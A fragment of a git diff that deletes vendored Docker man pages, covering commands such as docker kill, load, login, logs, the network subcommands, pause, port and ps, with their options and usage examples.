false, - "Env": null, - "Cmd": null, - "Image": "48ecf305d2cf7046c1f5f8fcbcd4994403173441d4a7f125b1bb0ceead9de731", - "Volumes": null, - "VolumeDriver": "", - "WorkingDir": "", - "Entrypoint": null, - "NetworkDisabled": false, - "MacAddress": "", - "OnBuild": null, - "Labels": {} - }, - "Architecture": "amd64", - "Os": "linux", - "Size": 186507296, - "VirtualSize": 186507296, - "GraphDriver": { - "Name": "devicemapper", - "Data": { - "DeviceId": "3", - "DeviceName": 
"docker-253:1-2763198-ded7cd95e059788f2586a51c275a4f151653779d6a7f4dad77c2bd34601d94e4", - "DeviceSize": "171798691840" - } - } - } - ] - -# HISTORY -April 2014, originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. -June 2014, updated by Sven Dowideit -April 2015, updated by Qiang Huang -October 2015, updated by Sally O'Malley diff --git a/vendor/github.com/docker/docker/man/docker-kill.1.md b/vendor/github.com/docker/docker/man/docker-kill.1.md deleted file mode 100644 index 36cbdb90ea..0000000000 --- a/vendor/github.com/docker/docker/man/docker-kill.1.md +++ /dev/null @@ -1,28 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-kill - Kill a running container using SIGKILL or a specified signal - -# SYNOPSIS -**docker kill** -[**--help**] -[**-s**|**--signal**[=*"KILL"*]] -CONTAINER [CONTAINER...] - -# DESCRIPTION - -The main process inside each container specified will be sent SIGKILL, - or any signal specified with option --signal. - -# OPTIONS -**--help** - Print usage statement - -**-s**, **--signal**="*KILL*" - Signal to send to the container - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) - based on docker.com source material and internal work. -June 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-load.1.md b/vendor/github.com/docker/docker/man/docker-load.1.md deleted file mode 100644 index b165173047..0000000000 --- a/vendor/github.com/docker/docker/man/docker-load.1.md +++ /dev/null @@ -1,56 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-load - Load an image from a tar archive or STDIN - -# SYNOPSIS -**docker load** -[**--help**] -[**-i**|**--input**[=*INPUT*]] -[**-q**|**--quiet**] - -# DESCRIPTION - -Loads a tarred repository from a file or the standard input stream. -Restores both images and tags. 
Write image names or IDs imported it -standard output stream. - -# OPTIONS -**--help** - Print usage statement - -**-i**, **--input**="" - Read from a tar archive file, instead of STDIN. The tarball may be compressed with gzip, bzip, or xz. - -**-q**, **--quiet** - Suppress the load progress bar but still outputs the imported images. - -# EXAMPLES - - $ docker images - REPOSITORY TAG IMAGE ID CREATED SIZE - busybox latest 769b9341d937 7 weeks ago 2.489 MB - $ docker load --input fedora.tar - # […] - Loaded image: fedora:rawhide - # […] - Loaded image: fedora:20 - # […] - $ docker images - REPOSITORY TAG IMAGE ID CREATED SIZE - busybox latest 769b9341d937 7 weeks ago 2.489 MB - fedora rawhide 0d20aec6529d 7 weeks ago 387 MB - fedora 20 58394af37342 7 weeks ago 385.5 MB - fedora heisenbug 58394af37342 7 weeks ago 385.5 MB - fedora latest 58394af37342 7 weeks ago 385.5 MB - -# See also -**docker-save(1)** to save one or more images to a tar archive (streamed to STDOUT by default). - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. -June 2014, updated by Sven Dowideit -July 2015 update by Mary Anthony -June 2016 update by Vincent Demeester diff --git a/vendor/github.com/docker/docker/man/docker-login.1.md b/vendor/github.com/docker/docker/man/docker-login.1.md deleted file mode 100644 index c0d4f795db..0000000000 --- a/vendor/github.com/docker/docker/man/docker-login.1.md +++ /dev/null @@ -1,53 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-login - Log in to a Docker registry. - -# SYNOPSIS -**docker login** -[**--help**] -[**-p**|**--password**[=*PASSWORD*]] -[**-u**|**--username**[=*USERNAME*]] -[SERVER] - -# DESCRIPTION -Log in to a Docker Registry located on the specified -`SERVER`. You can specify a URL or a `hostname` for the `SERVER` value. 
If you -do not specify a `SERVER`, the command uses Docker's public registry located at -`https://registry-1.docker.io/` by default. To get a username/password for Docker's public registry, create an account on Docker Hub. - -`docker login` requires user to use `sudo` or be `root`, except when: - -1. connecting to a remote daemon, such as a `docker-machine` provisioned `docker engine`. -2. user is added to the `docker` group. This will impact the security of your system; the `docker` group is `root` equivalent. See [Docker Daemon Attack Surface](https://docs.docker.com/engine/articles/security/#docker-daemon-attack-surface) for details. - -You can log into any public or private repository for which you have -credentials. When you log in, the command stores encoded credentials in -`$HOME/.docker/config.json` on Linux or `%USERPROFILE%/.docker/config.json` on Windows. - -# OPTIONS -**--help** - Print usage statement - -**-p**, **--password**="" - Password - -**-u**, **--username**="" - Username - -# EXAMPLES - -## Login to a registry on your localhost - - # docker login localhost:8080 - -# See also -**docker-logout(1)** to log out from a Docker registry. - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. -June 2014, updated by Sven Dowideit -April 2015, updated by Mary Anthony for v2 -November 2015, updated by Sally O'Malley diff --git a/vendor/github.com/docker/docker/man/docker-logout.1.md b/vendor/github.com/docker/docker/man/docker-logout.1.md deleted file mode 100644 index a8a4b7c3c0..0000000000 --- a/vendor/github.com/docker/docker/man/docker-logout.1.md +++ /dev/null @@ -1,32 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-logout - Log out from a Docker registry. - -# SYNOPSIS -**docker logout** -[SERVER] - -# DESCRIPTION -Log out of a Docker Registry located on the specified `SERVER`. 
You can -specify a URL or a `hostname` for the `SERVER` value. If you do not specify a -`SERVER`, the command attempts to log you out of Docker's public registry -located at `https://registry-1.docker.io/` by default. - -# OPTIONS -There are no available options. - -# EXAMPLES - -## Log out from a registry on your localhost - - # docker logout localhost:8080 - -# See also -**docker-login(1)** to log in to a Docker registry server. - -# HISTORY -June 2014, Originally compiled by Daniel, Dao Quang Minh (daniel at nitrous dot io) -July 2014, updated by Sven Dowideit -April 2015, updated by Mary Anthony for v2 diff --git a/vendor/github.com/docker/docker/man/docker-logs.1.md b/vendor/github.com/docker/docker/man/docker-logs.1.md deleted file mode 100644 index e70f796e28..0000000000 --- a/vendor/github.com/docker/docker/man/docker-logs.1.md +++ /dev/null @@ -1,71 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-logs - Fetch the logs of a container - -# SYNOPSIS -**docker logs** -[**-f**|**--follow**] -[**--help**] -[**--since**[=*SINCE*]] -[**-t**|**--timestamps**] -[**--tail**[=*"all"*]] -CONTAINER - -# DESCRIPTION -The **docker logs** command batch-retrieves whatever logs are present for -a container at the time of execution. This does not guarantee execution -order when combined with a docker run (i.e., your run may not have generated -any logs at the time you execute docker logs). - -The **docker logs --follow** command combines commands **docker logs** and -**docker attach**. It will first return all logs from the beginning and -then continue streaming new output from the container's stdout and stderr. - -**Warning**: This command works only for the **json-file** or **journald** -logging drivers. - -# OPTIONS -**--help** - Print usage statement - -**--details**=*true*|*false* - Show extra details provided to logs - -**-f**, **--follow**=*true*|*false* - Follow log output. The default is *false*. 
- -**--since**="" - Show logs since timestamp - -**-t**, **--timestamps**=*true*|*false* - Show timestamps. The default is *false*. - -**--tail**="*all*" - Output the specified number of lines at the end of logs (defaults to all logs) - -The `--since` option can be Unix timestamps, date formatted timestamps, or Go -duration strings (e.g. `10m`, `1h30m`) computed relative to the client machine's -time. Supported formats for date formatted time stamps include RFC3339Nano, -RFC3339, `2006-01-02T15:04:05`, `2006-01-02T15:04:05.999999999`, -`2006-01-02Z07:00`, and `2006-01-02`. The local timezone on the client will be -used if you do not provide either a `Z` or a `+-00:00` timezone offset at the -end of the timestamp. When providing Unix timestamps enter -seconds[.nanoseconds], where seconds is the number of seconds that have elapsed -since January 1, 1970 (midnight UTC/GMT), not counting leap seconds (aka Unix -epoch or Unix time), and the optional .nanoseconds field is a fraction of a -second no more than nine digits long. You can combine the `--since` option with -either or both of the `--follow` or `--tail` options. - -The `docker logs --details` command will add on extra attributes, such as -environment variables and labels, provided to `--log-opt` when creating the -container. - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. 
-June 2014, updated by Sven Dowideit -July 2014, updated by Sven Dowideit -April 2015, updated by Ahmet Alp Balkan -October 2015, updated by Mike Brown diff --git a/vendor/github.com/docker/docker/man/docker-network-connect.1.md b/vendor/github.com/docker/docker/man/docker-network-connect.1.md deleted file mode 100644 index 096ec77a4d..0000000000 --- a/vendor/github.com/docker/docker/man/docker-network-connect.1.md +++ /dev/null @@ -1,66 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% OCT 2015 -# NAME -docker-network-connect - connect a container to a network - -# SYNOPSIS -**docker network connect** -[**--help**] -NETWORK CONTAINER - -# DESCRIPTION - -Connects a container to a network. You can connect a container by name -or by ID. Once connected, the container can communicate with other containers in -the same network. - -```bash -$ docker network connect multi-host-network container1 -``` - -You can also use the `docker run --network=` option to start a container and immediately connect it to a network. - -```bash -$ docker run -itd --network=multi-host-network --ip 172.20.88.22 --ip6 2001:db8::8822 busybox -``` -You can pause, restart, and stop containers that are connected to a network. -A container connects to its configured networks when it runs. - -If specified, the container's IP address(es) is reapplied when a stopped -container is restarted. If the IP address is no longer available, the container -fails to start. One way to guarantee that the IP address is available is -to specify an `--ip-range` when creating the network, and choose the static IP -address(es) from outside that range. This ensures that the IP address is not -given to another container while this container is not on the network. 
- -```bash -$ docker network create --subnet 172.20.0.0/16 --ip-range 172.20.240.0/20 multi-host-network -``` - -```bash -$ docker network connect --ip 172.20.128.2 multi-host-network container2 -``` - -To verify the container is connected, use the `docker network inspect` command. Use `docker network disconnect` to remove a container from the network. - -Once connected in network, containers can communicate using only another -container's IP address or name. For `overlay` networks or custom plugins that -support multi-host connectivity, containers connected to the same multi-host -network but launched from different Engines can also communicate in this way. - -You can connect a container to one or more networks. The networks need not be the same type. For example, you can connect a single container bridge and overlay networks. - - -# OPTIONS -**NETWORK** - Specify network name - -**CONTAINER** - Specify container name - -**--help** - Print usage statement - -# HISTORY -OCT 2015, created by Mary Anthony diff --git a/vendor/github.com/docker/docker/man/docker-network-create.1.md b/vendor/github.com/docker/docker/man/docker-network-create.1.md deleted file mode 100644 index 44ce8e15c2..0000000000 --- a/vendor/github.com/docker/docker/man/docker-network-create.1.md +++ /dev/null @@ -1,187 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% OCT 2015 -# NAME -docker-network-create - create a new network - -# SYNOPSIS -**docker network create** -[**--attachable**] -[**--aux-address**=*map[]*] -[**-d**|**--driver**=*DRIVER*] -[**--gateway**=*[]*] -[**--help**] -[**--internal**] -[**--ip-range**=*[]*] -[**--ipam-driver**=*default*] -[**--ipam-opt**=*map[]*] -[**--ipv6**] -[**--label**[=*[]*]] -[**-o**|**--opt**=*map[]*] -[**--subnet**=*[]*] -NETWORK-NAME - -# DESCRIPTION - -Creates a new network. The `DRIVER` accepts `bridge` or `overlay` which are the -built-in network drivers. 
If you have installed a third party or your own custom -network driver you can specify that `DRIVER` here also. If you don't specify the -`--driver` option, the command automatically creates a `bridge` network for you. -When you install Docker Engine it creates a `bridge` network automatically. This -network corresponds to the `docker0` bridge that Engine has traditionally relied -on. When launch a new container with `docker run` it automatically connects to -this bridge network. You cannot remove this default bridge network but you can -create new ones using the `network create` command. - -```bash -$ docker network create -d bridge my-bridge-network -``` - -Bridge networks are isolated networks on a single Engine installation. If you -want to create a network that spans multiple Docker hosts each running an -Engine, you must create an `overlay` network. Unlike `bridge` networks overlay -networks require some pre-existing conditions before you can create one. These -conditions are: - -* Access to a key-value store. Engine supports Consul, Etcd, and Zookeeper (Distributed store) key-value stores. -* A cluster of hosts with connectivity to the key-value store. -* A properly configured Engine `daemon` on each host in the cluster. - -The `dockerd` options that support the `overlay` network are: - -* `--cluster-store` -* `--cluster-store-opt` -* `--cluster-advertise` - -To read more about these options and how to configure them, see ["*Get started -with multi-host -network*"](https://docs.docker.com/engine/userguide/networking/get-started-overlay/). - -It is also a good idea, though not required, that you install Docker Swarm on to -manage the cluster that makes up your network. Swarm provides sophisticated -discovery and server management that can assist your implementation. 
- -Once you have prepared the `overlay` network prerequisites you simply choose a -Docker host in the cluster and issue the following to create the network: - -```bash -$ docker network create -d overlay my-multihost-network -``` - -Network names must be unique. The Docker daemon attempts to identify naming -conflicts but this is not guaranteed. It is the user's responsibility to avoid -name conflicts. - -## Connect containers - -When you start a container use the `--network` flag to connect it to a network. -This adds the `busybox` container to the `mynet` network. - -```bash -$ docker run -itd --network=mynet busybox -``` - -If you want to add a container to a network after the container is already -running use the `docker network connect` subcommand. - -You can connect multiple containers to the same network. Once connected, the -containers can communicate using only another container's IP address or name. -For `overlay` networks or custom plugins that support multi-host connectivity, -containers connected to the same multi-host network but launched from different -Engines can also communicate in this way. - -You can disconnect a container from a network using the `docker network -disconnect` command. - -## Specifying advanced options - -When you create a network, Engine creates a non-overlapping subnetwork for the -network by default. This subnetwork is not a subdivision of an existing network. -It is purely for ip-addressing purposes. You can override this default and -specify subnetwork values directly using the `--subnet` option. On a -`bridge` network you can only create a single subnet: - -```bash -$ docker network create -d bridge --subnet=192.168.0.0/16 br0 -``` - -Additionally, you also specify the `--gateway` `--ip-range` and `--aux-address` -options. 
- -```bash -$ docker network create \ - --driver=bridge \ - --subnet=172.28.0.0/16 \ - --ip-range=172.28.5.0/24 \ - --gateway=172.28.5.254 \ - br0 -``` - -If you omit the `--gateway` flag the Engine selects one for you from inside a -preferred pool. For `overlay` networks and for network driver plugins that -support it you can create multiple subnetworks. - -```bash -$ docker network create -d overlay \ - --subnet=192.168.0.0/16 \ - --subnet=192.170.0.0/16 \ - --gateway=192.168.0.100 \ - --gateway=192.170.0.100 \ - --ip-range=192.168.1.0/24 \ - --aux-address="my-router=192.168.1.5" --aux-address="my-switch=192.168.1.6" \ - --aux-address="my-printer=192.170.1.5" --aux-address="my-nas=192.170.1.6" \ - my-multihost-network -``` - -Be sure that your subnetworks do not overlap. If they do, the network create -fails and Engine returns an error. - -### Network internal mode - -By default, when you connect a container to an `overlay` network, Docker also -connects a bridge network to it to provide external connectivity. If you want -to create an externally isolated `overlay` network, you can specify the -`--internal` option. - -# OPTIONS -**--attachable** - Enable manual container attachment - -**--aux-address**=map[] - Auxiliary IPv4 or IPv6 addresses used by network driver - -**-d**, **--driver**=*DRIVER* - Driver to manage the Network bridge or overlay. The default is bridge. 
- -**--gateway**=[] - IPv4 or IPv6 Gateway for the master subnet - -**--help** - Print usage - -**--internal** - Restrict external access to the network - -**--ip-range**=[] - Allocate container ip from a sub-range - -**--ipam-driver**=*default* - IP Address Management Driver - -**--ipam-opt**=map[] - Set custom IPAM driver options - -**--ipv6** - Enable IPv6 networking - -**--label**=*label* - Set metadata for a network - -**-o**, **--opt**=map[] - Set custom driver options - -**--subnet**=[] - Subnet in CIDR format that represents a network segment - -# HISTORY -OCT 2015, created by Mary Anthony diff --git a/vendor/github.com/docker/docker/man/docker-network-disconnect.1.md b/vendor/github.com/docker/docker/man/docker-network-disconnect.1.md deleted file mode 100644 index 09bcac51b0..0000000000 --- a/vendor/github.com/docker/docker/man/docker-network-disconnect.1.md +++ /dev/null @@ -1,36 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% OCT 2015 -# NAME -docker-network-disconnect - disconnect a container from a network - -# SYNOPSIS -**docker network disconnect** -[**--help**] -[**--force**] -NETWORK CONTAINER - -# DESCRIPTION - -Disconnects a container from a network. 
- -```bash - $ docker network disconnect multi-host-network container1 -``` - - -# OPTIONS -**NETWORK** - Specify network name - -**CONTAINER** - Specify container name - -**--force** - Force the container to disconnect from a network - -**--help** - Print usage statement - -# HISTORY -OCT 2015, created by Mary Anthony diff --git a/vendor/github.com/docker/docker/man/docker-network-inspect.1.md b/vendor/github.com/docker/docker/man/docker-network-inspect.1.md deleted file mode 100644 index f27c98cb34..0000000000 --- a/vendor/github.com/docker/docker/man/docker-network-inspect.1.md +++ /dev/null @@ -1,112 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% OCT 2015 -# NAME -docker-network-inspect - inspect a network - -# SYNOPSIS -**docker network inspect** -[**-f**|**--format**[=*FORMAT*]] -[**--help**] -NETWORK [NETWORK...] - -# DESCRIPTION - -Returns information about one or more networks. By default, this command renders all results in a JSON object. For example, if you connect two containers to the default `bridge` network: - -```bash -$ sudo docker run -itd --name=container1 busybox -f2870c98fd504370fb86e59f32cd0753b1ac9b69b7d80566ffc7192a82b3ed27 - -$ sudo docker run -itd --name=container2 busybox -bda12f8922785d1f160be70736f26c1e331ab8aaf8ed8d56728508f2e2fd4727 -``` - -The `network inspect` command shows the containers, by id, in its -results. You can specify an alternate format to execute a given -template for each result. Go's -[text/template](http://golang.org/pkg/text/template/) package -describes all the details of the format. 
- -```bash -$ sudo docker network inspect bridge -[ - { - "Name": "bridge", - "Id": "b2b1a2cba717161d984383fd68218cf70bbbd17d328496885f7c921333228b0f", - "Scope": "local", - "Driver": "bridge", - "IPAM": { - "Driver": "default", - "Config": [ - { - "Subnet": "172.17.42.1/16", - "Gateway": "172.17.42.1" - } - ] - }, - "Internal": false, - "Containers": { - "bda12f8922785d1f160be70736f26c1e331ab8aaf8ed8d56728508f2e2fd4727": { - "Name": "container2", - "EndpointID": "0aebb8fcd2b282abe1365979536f21ee4ceaf3ed56177c628eae9f706e00e019", - "MacAddress": "02:42:ac:11:00:02", - "IPv4Address": "172.17.0.2/16", - "IPv6Address": "" - }, - "f2870c98fd504370fb86e59f32cd0753b1ac9b69b7d80566ffc7192a82b3ed27": { - "Name": "container1", - "EndpointID": "a00676d9c91a96bbe5bcfb34f705387a33d7cc365bac1a29e4e9728df92d10ad", - "MacAddress": "02:42:ac:11:00:01", - "IPv4Address": "172.17.0.1/16", - "IPv6Address": "" - } - }, - "Options": { - "com.docker.network.bridge.default_bridge": "true", - "com.docker.network.bridge.enable_icc": "true", - "com.docker.network.bridge.enable_ip_masquerade": "true", - "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0", - "com.docker.network.bridge.name": "docker0", - "com.docker.network.driver.mtu": "1500" - } - } -] -``` - -Returns the information about the user-defined network: - -```bash -$ docker network create simple-network -69568e6336d8c96bbf57869030919f7c69524f71183b44d80948bd3927c87f6a -$ docker network inspect simple-network -[ - { - "Name": "simple-network", - "Id": "69568e6336d8c96bbf57869030919f7c69524f71183b44d80948bd3927c87f6a", - "Scope": "local", - "Driver": "bridge", - "IPAM": { - "Driver": "default", - "Config": [ - { - "Subnet": "172.22.0.0/16", - "Gateway": "172.22.0.1" - } - ] - }, - "Containers": {}, - "Options": {} - } -] -``` - -# OPTIONS -**-f**, **--format**="" - Format the output using the given Go template. 
- -**--help** - Print usage statement - -# HISTORY -OCT 2015, created by Mary Anthony diff --git a/vendor/github.com/docker/docker/man/docker-network-ls.1.md b/vendor/github.com/docker/docker/man/docker-network-ls.1.md deleted file mode 100644 index f319e66035..0000000000 --- a/vendor/github.com/docker/docker/man/docker-network-ls.1.md +++ /dev/null @@ -1,188 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% OCT 2015 -# NAME -docker-network-ls - list networks - -# SYNOPSIS -**docker network ls** -[**-f**|**--filter**[=*[]*]] -[**--format**=*"TEMPLATE"*] -[**--no-trunc**[=*true*|*false*]] -[**-q**|**--quiet**[=*true*|*false*]] -[**--help**] - -# DESCRIPTION - -Lists all the networks the Engine `daemon` knows about. This includes the -networks that span across multiple hosts in a cluster, for example: - -```bash - $ docker network ls - NETWORK ID NAME DRIVER SCOPE - 7fca4eb8c647 bridge bridge local - 9f904ee27bf5 none null local - cf03ee007fb4 host host local - 78b03ee04fc4 multi-host overlay swarm -``` - -Use the `--no-trunc` option to display the full network id: - -```bash -$ docker network ls --no-trunc -NETWORK ID NAME DRIVER -18a2866682b85619a026c81b98a5e375bd33e1b0936a26cc497c283d27bae9b3 none null -c288470c46f6c8949c5f7e5099b5b7947b07eabe8d9a27d79a9cbf111adcbf47 host host -7b369448dccbf865d397c8d2be0cda7cf7edc6b0945f77d2529912ae917a0185 bridge bridge -95e74588f40db048e86320c6526440c504650a1ff3e9f7d60a497c4d2163e5bd foo bridge -63d1ff1f77b07ca51070a8c227e962238358bd310bde1529cf62e6c307ade161 dev bridge -``` - -## Filtering - -The filtering flag (`-f` or `--filter`) format is a `key=value` pair. If there -is more than one filter, then pass multiple flags (e.g. `--filter "foo=bar" --filter "bif=baz"`). -Multiple filter flags are combined as an `OR` filter. For example, -`-f type=custom -f type=builtin` returns both `custom` and `builtin` networks. 
- -The currently supported filters are: - -* driver -* id (network's id) -* label (`label=` or `label==`) -* name (network's name) -* type (custom|builtin) - -#### Driver - -The `driver` filter matches networks based on their driver. - -The following example matches networks with the `bridge` driver: - -```bash -$ docker network ls --filter driver=bridge -NETWORK ID NAME DRIVER -db9db329f835 test1 bridge -f6e212da9dfd test2 bridge -``` - -#### ID - -The `id` filter matches on all or part of a network's ID. - -The following filter matches all networks with an ID containing the -`63d1ff1f77b0...` string. - -```bash -$ docker network ls --filter id=63d1ff1f77b07ca51070a8c227e962238358bd310bde1529cf62e6c307ade161 -NETWORK ID NAME DRIVER -63d1ff1f77b0 dev bridge -``` - -You can also filter for a substring in an ID as this shows: - -```bash -$ docker network ls --filter id=95e74588f40d -NETWORK ID NAME DRIVER -95e74588f40d foo bridge - -$ docker network ls --filter id=95e -NETWORK ID NAME DRIVER -95e74588f40d foo bridge -``` - -#### Label - -The `label` filter matches networks based on the presence of a `label` alone or a `label` and a -value. - -The following filter matches networks with the `usage` label regardless of its value. - -```bash -$ docker network ls -f "label=usage" -NETWORK ID NAME DRIVER -db9db329f835 test1 bridge -f6e212da9dfd test2 bridge -``` - -The following filter matches networks with the `usage` label with the `prod` value. - -```bash -$ docker network ls -f "label=usage=prod" -NETWORK ID NAME DRIVER -f6e212da9dfd test2 bridge -``` - -#### Name - -The `name` filter matches on all or part of a network's name. - -The following filter matches all networks with a name containing the `foobar` string. 
- -```bash -$ docker network ls --filter name=foobar -NETWORK ID NAME DRIVER -06e7eef0a170 foobar bridge -``` - -You can also filter for a substring in a name as this shows: - -```bash -$ docker network ls --filter name=foo -NETWORK ID NAME DRIVER -95e74588f40d foo bridge -06e7eef0a170 foobar bridge -``` - -#### Type - -The `type` filter supports two values; `builtin` displays predefined networks -(`bridge`, `none`, `host`), whereas `custom` displays user defined networks. - -The following filter matches all user defined networks: - -```bash -$ docker network ls --filter type=custom -NETWORK ID NAME DRIVER -95e74588f40d foo bridge -63d1ff1f77b0 dev bridge -``` - -By having this flag it allows for batch cleanup. For example, use this filter -to delete all user defined networks: - -```bash -$ docker network rm `docker network ls --filter type=custom -q` -``` - -A warning will be issued when trying to remove a network that has containers -attached. - -# OPTIONS - -**-f**, **--filter**=*[]* - filter output based on conditions provided. - -**--format**="*TEMPLATE*" - Pretty-print networks using a Go template. - Valid placeholders: - .ID - Network ID - .Name - Network name - .Driver - Network driver - .Scope - Network scope (local, global) - .IPv6 - Whether IPv6 is enabled on the network or not - .Internal - Whether the network is internal or not - .Labels - All labels assigned to the network - .Label - Value of a specific label for this network. 
For example `{{.Label "project.version"}}` - -**--no-trunc**=*true*|*false* - Do not truncate the output - -**-q**, **--quiet**=*true*|*false* - Only display network IDs - -**--help** - Print usage statement - -# HISTORY -OCT 2015, created by Mary Anthony diff --git a/vendor/github.com/docker/docker/man/docker-network-rm.1.md b/vendor/github.com/docker/docker/man/docker-network-rm.1.md deleted file mode 100644 index c094a15286..0000000000 --- a/vendor/github.com/docker/docker/man/docker-network-rm.1.md +++ /dev/null @@ -1,43 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% OCT 2015 -# NAME -docker-network-rm - remove one or more networks - -# SYNOPSIS -**docker network rm** -[**--help**] -NETWORK [NETWORK...] - -# DESCRIPTION - -Removes one or more networks by name or identifier. To remove a network, -you must first disconnect any containers connected to it. -To remove the network named 'my-network': - -```bash - $ docker network rm my-network -``` - -To delete multiple networks in a single `docker network rm` command, provide -multiple network names or ids. The following example deletes a network with id -`3695c422697f` and a network named `my-network`: - -```bash - $ docker network rm 3695c422697f my-network -``` - -When you specify multiple networks, the command attempts to delete each in turn. -If the deletion of one network fails, the command continues to the next on the -list and tries to delete that. The command reports success or failure for each -deletion. 
- -# OPTIONS -**NETWORK** - Specify network name or id - -**--help** - Print usage statement - -# HISTORY -OCT 2015, created by Mary Anthony diff --git a/vendor/github.com/docker/docker/man/docker-pause.1.md b/vendor/github.com/docker/docker/man/docker-pause.1.md deleted file mode 100644 index 11eef5321f..0000000000 --- a/vendor/github.com/docker/docker/man/docker-pause.1.md +++ /dev/null @@ -1,32 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-pause - Pause all processes within one or more containers - -# SYNOPSIS -**docker pause** -CONTAINER [CONTAINER...] - -# DESCRIPTION - -The `docker pause` command suspends all processes in the specified containers. -On Linux, this uses the cgroups freezer. Traditionally, when suspending a process -the `SIGSTOP` signal is used, which is observable by the process being suspended. -With the cgroups freezer the process is unaware, and unable to capture, -that it is being suspended, and subsequently resumed. On Windows, only Hyper-V -containers can be paused. - -See the [cgroups freezer documentation] -(https://www.kernel.org/doc/Documentation/cgroup-v1/freezer-subsystem.txt) for -further details. - -# OPTIONS -**--help** - Print usage statement - -# See also -**docker-unpause(1)** to unpause all processes within one or more containers. 
- -# HISTORY -June 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-port.1.md b/vendor/github.com/docker/docker/man/docker-port.1.md deleted file mode 100644 index 83e9cf93b6..0000000000 --- a/vendor/github.com/docker/docker/man/docker-port.1.md +++ /dev/null @@ -1,47 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-port - List port mappings for the CONTAINER, or lookup the public-facing port that is NAT-ed to the PRIVATE_PORT - -# SYNOPSIS -**docker port** -[**--help**] -CONTAINER [PRIVATE_PORT[/PROTO]] - -# DESCRIPTION -List port mappings for the CONTAINER, or lookup the public-facing port that is NAT-ed to the PRIVATE_PORT - -# OPTIONS -**--help** - Print usage statement - -# EXAMPLES - - # docker ps - CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES - b650456536c7 busybox:latest top 54 minutes ago Up 54 minutes 0.0.0.0:1234->9876/tcp, 0.0.0.0:4321->7890/tcp test - -## Find out all the ports mapped - - # docker port test - 7890/tcp -> 0.0.0.0:4321 - 9876/tcp -> 0.0.0.0:1234 - -## Find out a specific mapping - - # docker port test 7890/tcp - 0.0.0.0:4321 - - # docker port test 7890 - 0.0.0.0:4321 - -## An example showing error for non-existent mapping - - # docker port test 7890/udp - 2014/06/24 11:53:36 Error: No public port '7890/udp' published for test - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -June 2014, updated by Sven Dowideit -November 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-ps.1.md b/vendor/github.com/docker/docker/man/docker-ps.1.md deleted file mode 100644 index d9aa39f8fd..0000000000 --- a/vendor/github.com/docker/docker/man/docker-ps.1.md +++ /dev/null @@ -1,145 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% FEBRUARY 2015 -# NAME -docker-ps - List containers - -# SYNOPSIS -**docker ps** -[**-a**|**--all**] -[**-f**|**--filter**[=*[]*]] 
-[**--format**=*"TEMPLATE"*] -[**--help**] -[**-l**|**--latest**] -[**-n**[=*-1*]] -[**--no-trunc**] -[**-q**|**--quiet**] -[**-s**|**--size**] - -# DESCRIPTION - -List the containers in the local repository. By default this shows only -the running containers. - -# OPTIONS -**-a**, **--all**=*true*|*false* - Show all containers. Only running containers are shown by default. The default is *false*. - -**-f**, **--filter**=[] - Filter output based on these conditions: - - exited= an exit code of - - label= or label== - - status=(created|restarting|running|paused|exited|dead) - - name= a container's name - - id= a container's ID - - is-task=(true|false) - containers that are a task (part of a service managed by swarm) - - before=(|) - - since=(|) - - ancestor=([:tag]||) - containers created from an image or a descendant. - - volume=(|) - - network=(|) - containers connected to the provided network - - health=(starting|healthy|unhealthy|none) - filters containers based on healthcheck status - -**--format**="*TEMPLATE*" - Pretty-print containers using a Go template. - Valid placeholders: - .ID - Container ID - .Image - Image ID - .Command - Quoted command - .CreatedAt - Time when the container was created. - .RunningFor - Elapsed time since the container was started. - .Ports - Exposed ports. - .Status - Container status. - .Size - Container disk size. - .Names - Container names. - .Labels - All labels assigned to the container. - .Label - Value of a specific label for this container. For example `{{.Label "com.docker.swarm.cpu"}}` - .Mounts - Names of the volumes mounted in this container. - -**--help** - Print usage statement - -**-l**, **--latest**=*true*|*false* - Show only the latest created container (includes all states). The default is *false*. - -**-n**=*-1* - Show n last created containers (includes all states). - -**--no-trunc**=*true*|*false* - Don't truncate output. The default is *false*. - -**-q**, **--quiet**=*true*|*false* - Only display numeric IDs. 
